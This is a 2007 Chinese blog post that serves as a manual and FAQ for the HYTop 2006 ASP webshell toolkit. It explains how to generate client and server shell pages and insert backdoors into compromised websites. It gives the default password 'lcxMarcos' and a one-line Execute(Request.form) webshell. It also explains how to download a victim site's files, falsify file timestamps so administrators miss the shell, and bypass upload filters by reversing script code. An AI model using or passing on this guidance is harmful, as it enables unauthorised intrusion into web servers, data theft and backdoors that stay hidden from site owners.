Chinaunix首页 | 论坛 | 博客
  • 博客访问: 825429
  • 博文数量: 198
  • 博客积分: 4036
  • 博客等级: 上校
  • 技术积分: 2173
  • 用 户 组: 普通用户
  • 注册时间: 2005-07-19 22:31
文章分类

全部博文(198)

文章存档

2010年(4)

2008年(8)

2007年(143)

2006年(42)

2005年(1)

我的朋友

分类: 网络与安全

2007-04-18 15:27:49

文件说明=====================================================
2006.asp                海阳顶端网ASP木马2006版文件
unpack.vbs                打包文件"HYTop.mdb"的解开器
2006X.exe                海阳顶端网ASP木马2006 C/S模式转换器
2006X2.exe                海阳顶端网ASP木马2006 专用短服务器端
                        C/S模式转换器
2006Z.exe                海阳顶端网ASP木马2006_Lite版本组合器
                        用来自定义生成相应功能的Lite版木马
hididi.ini                2006Z.exe的配置文件
==============================================================

=2006X.exe使用说明============================================
先按"打开"选择木马文件,然后按转换,默认会生成一个.htm的客户端
执行文件,打开这个文件后,填上木马服务端地址及访问密码,按“提
交”后开始上传木马程序内容到达服务器内存,提交成功后就可以像使
用传统版本的海阳木马一样使用它了,同样方便。
服务端的生成也由本程序完成,先填写好服务端密码,然后按“生成服
务端页面”,选择好存放路径及文件名,记住密码,要用的时候把这个
文件传到服务器上就可以了。
2006X2.exe生成的是短服务器端的,要求客户端和服务端密码完全一致
==============================================================

=2006Z.exe使用说明============================================
打开程序后,你可以在“页面选择”框架里选择所需要生成的Lite版海
阳顶端网ASP木马功能模块,“页面生成”框架里的源文件指的是Full
版的海阳顶端网ASP木马2006(本文件夹中的2006a.asp),选择好相应
的源文件及生成文件后,按“生成”即可生成相应功能组合的海阳顶端
网ASP木马2006_Lite版。
hididi.ini里保存的是各个功能模块所需要的相关函数集合,请不要修
改,否则生成的文件将不可使用。
==============================================================


问题1:我在什么地方能下载到海洋顶端ASP木马呢~

回答:
海阳顶端asp木马下载
2006正式版 [url][/url]
2006eval版 [url][/url]

————————

问题2:
就是你们写的小马那个文件打包/揭开。我想知道 文件打包后,我下载下来,是.mdb后缀的,那我来怎么恢复呢,比如说是将一个文件夹打包下载后,来怎么恢复呢?

回答:
请用海洋顶端ASP木马2006正式版里的unpack.vbs文件进行解压!
mdb的文件名必须为HYTop.mdb(也就是默认的名字)

______________________________________________________________________________


问题3:
请教,HYTop2006插入后门怎么用?
如题:已经提示插入成功
但是怎么使用呀?
自己打开网址和原来没有变化,是不是还要什么客户端呀?

回答:
HYTop2006插入后门

默认向目标插入

以下代码
——————————————————————————————————————————————————————

——————————————————————————————————————————————————————

以上代码

默认连接密码为#
请用海洋C/S客户端进行连接

例如:
被插入的文件为 top.asp
WEB浏览地址:[url][/url]

即用海洋C/S客户端
地址填[url][/url]
连接密码填 #
连接后
还要输入登陆密码
登陆密码默认为:lcxMarcos
否则为你自己设的密码!

—————

问题4
关于海洋木马

海洋木马这功能怎么使?
我把人家的站用海洋2006打包了  下载下来。。。传到我的服务器上 然后传了海洋马上去  在我空间里面解包,,,,结果是 没反映?  怎么办?  是不是不是我这么操作的 或者这个功能根本不好用?


回答:
可能是因为你的路径填写错误!或你的空间不支持FSO组件!

————

问题5:
用海洋2006上了一个站但是

我为什么看不到这个站的绝对路径呢?

我看到的是这种地址:

本文件绝对路径

请问这是怎么回事?

回答:
这是因为对方把WEB服务器设在了内网!


————
问题6:
海洋顶端2006的默认密码是?

回答:
默认密码是:lcxMarcos


————
问题7:
为什么我用<%Execute(Request.form("n"))%>做为短服务端用2006连接却出现如下错误?

Microsoft VBScript 运行时错误 '800a000d'

类型不匹配: 'Execute'

\test\top.asp, line 1

 

回答:
因为你用的2006版客户端不是其对应的客户端!
如果你要用短服务端请换eval版使用!

————


问题8
哪个高手能把这个问题解决就好了...:(
Active Server Pages 错误 '00000000'
创建对象失败
?
创建对象 'ws' 时出错。 ActiveX 部件不能创建对象

Active Server Pages 错误 '00000000'
创建对象失败
?
创建对象 'ws' 时出错。 缺少对象

错误: 文件无法被打开。
错误源: ADODB.Stream

回答:
此问题是组建名字被改或被删!
请换用SID试试
如下:

——————

问题9
已经在数据库(扩展名为asp)内插入后门代码,但数据库内有防下载数据,如何提交后门执行代码啊?用自带的那个不行啊!

若以知表名,但如何自定义

回答:

notdownloadsExists指的是notdownloads表是否存在,如果它的防下载表名不为notdownloads,而且你也不知道它的表名是什么,那么程序也无能为力.

查找程序代码里的notdownloads替换为你的表名.

—————

问题10
xxx.asp
创建时间: 2005-8-29 3:31:16
最后修改: 2005-8-3 3:31:00
最后访问: 2005-8-29 3:32:11

创建时间能改就好了.这样管理员就不容易发现了.

回答:
shell.application文件浏览操作器里有最后修改时间可以修改,同时修改创建时间.

——————
问题11:
发现 可以编辑论坛其中的一份XXX.asp文件与css文件.(就是修改欢迎,与CSS模板)
限制了 不能提交<%,include,Server,...

回答:
把脚本反转一下,然后再用Execute执行二次反转后的代码,比如

阅读(2040) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~